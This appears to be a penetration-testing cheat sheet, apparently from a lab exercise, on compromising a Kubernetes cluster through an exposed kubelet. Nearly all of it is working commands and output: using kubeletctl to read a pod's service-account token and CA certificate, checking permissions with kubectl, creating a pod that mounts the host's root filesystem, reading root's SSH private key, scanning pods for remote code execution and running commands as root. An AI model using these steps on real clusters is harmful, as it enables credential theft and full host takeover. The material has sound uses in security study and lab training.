Kubernetes
use the tool kubeletctl to extract the token and the certificate of the service account.
Sample Exploitation
Extract Tokens
$ kubeletctl -i --server 10.129.10.11 exec "cat /var/run/secrets/kubernetes.io/serviceaccount/token" -p nginx -c nginx | tee -a k8.token eyJhbGciOiJSUzI1NiIsImtpZC...SNIP...UfT3OKQH6SdwExtract Certificates
$ kubeletctl --server 10.129.10.11 exec "cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt" -p nginx -c nginx | tee -a ca.crt -----BEGIN CERTIFICATE----- MIIDBjCCAe6gAwIBAgIBATANBgkqhkiG9w0BAQsFADAVMRMwEQYDVQQDEwptaW5p <SNIP> MhxgN4lKI0zpxFBTpIwJ3iZemSfh3pY2UqX03ju4TreksGMkX/hZ2NyIMrKDpolD 602eXnhZAL3+dA== -----END CERTIFICATE-----List privileges
$ export token=`cat k8.token` $ kubectl --token=$token --certificate-authority=ca.crt --server=https://10.129.10.11:6443 auth can-i --list Resources Non-Resource URLs Resource Names Verbs selfsubjectaccessreviews.authorization.k8s.io [] [] [create] selfsubjectrulesreviews.authorization.k8s.io [] [] [create] pods [] [] [get create list] ...SNIP...Focus on the not selfsubject resources, notice that we can get, create, and list pods.
Create a pod yaml
apiVersion: v1 kind: Pod metadata: name: privesc namespace: default spec: containers: - name: privesc image: nginx:1.14.2 volumeMounts: - mountPath: /root name: mount-root-into-mnt volumes: - name: mount-root-into-mnt hostPath: path: / automountServiceAccountToken: true hostNetwork: trueCreate a new pod
$ kubectl --token=$token --certificate-authority=ca.crt --server=https://10.129.96.98:6443 apply -f privesc.yaml pod/privesc created $ kubectl --token=$token --certificate-authority=ca.crt --server=https://10.129.96.98:6443 get pods NAME READY STATUS RESTARTS AGE nginx 1/1 Running 0 23m privesc 1/1 Running 0 12sExtract root ssh keys
$ kubeletctl --server 10.129.10.11 exec "cat /root/root/.ssh/id_rsa" -p privesc -c privesc -----BEGIN OPENSSH PRIVATE KEY----- ...SNIP...
KubeletCTL Commands
Extract pods
$ kubeletctl -i --server 10.129.10.11 pods ┌────────────────────────────────────────────────────────────────────────────────┐ │ Pods from Kubelet │ ├───┬────────────────────────────────────┬─────────────┬─────────────────────────┤ │ │ POD │ NAMESPACE │ CONTAINERS │ ├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤ │ 1 │ coredns-78fcd69978-zbwf9 │ kube-system │ coredns │ │ │ │ │ │ ├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤ │ 2 │ nginx │ default │ nginx │ │ │ │ │ │ ├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤ │ 3 │ etcd-steamcloud │ kube-system │ etcd │ │ │ │ │ │ ├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤Scan pods for RCE vulnerablity
$ kubeletctl -i --server 10.129.10.11 scan rce ┌─────────────────────────────────────────────────────────────────────────────────────────────────────┐ │ Node with pods vulnerable to RCE │ ├───┬──────────────┬────────────────────────────────────┬─────────────┬─────────────────────────┬─────┤ │ │ NODE IP │ PODS │ NAMESPACE │ CONTAINERS │ RCE │ ├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤ │ │ │ │ │ │ RUN │ ├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤ │ 1 │ 10.129.10.11 │ nginx │ default │ nginx │ + │ ├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤ │ 2 │ │ etcd-steamcloud │ kube-system │ etcd │ - │ ├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤Execute Commands
$ kubeletctl -i --server 10.129.10.11 exec "id" -p nginx -c nginx uid=0(root) gid=0(root) groups=0(root)
Last updated